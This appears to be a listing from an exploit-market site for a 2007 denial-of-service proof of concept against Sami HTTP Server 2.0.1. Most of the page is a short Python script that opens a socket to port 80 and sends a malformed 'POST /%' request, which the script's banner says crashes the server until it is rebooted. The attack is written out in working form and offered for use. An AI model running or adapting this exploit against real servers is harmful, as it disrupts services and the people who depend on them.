[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit

Author
shinnai
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6356
Category
dos / poc
Date add
11-04-2007
Platform
unsorted
=============================================================
Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit
=============================================================




# usr/bin/python

import socket

print
"-------------------------------------------------------------------------"
print " Sami HTTP Server 2.0.1 POST request Denial of Service"
print " url: http://www.karjasoft.com"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org"
print " Sending to the webserver a 'POST /%' will cause an abnormal
termination"
print " of the program that requires the reboot of the webserver."
print
"-------------------------------------------------------------------------"

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   conn = s.connect(("127.0.0.1",80))
   s.send("POST /% HTTP/1.0 \n\n")
except:
   print "Unable to connect. exiting."



#  0day.today [2024-12-25]  #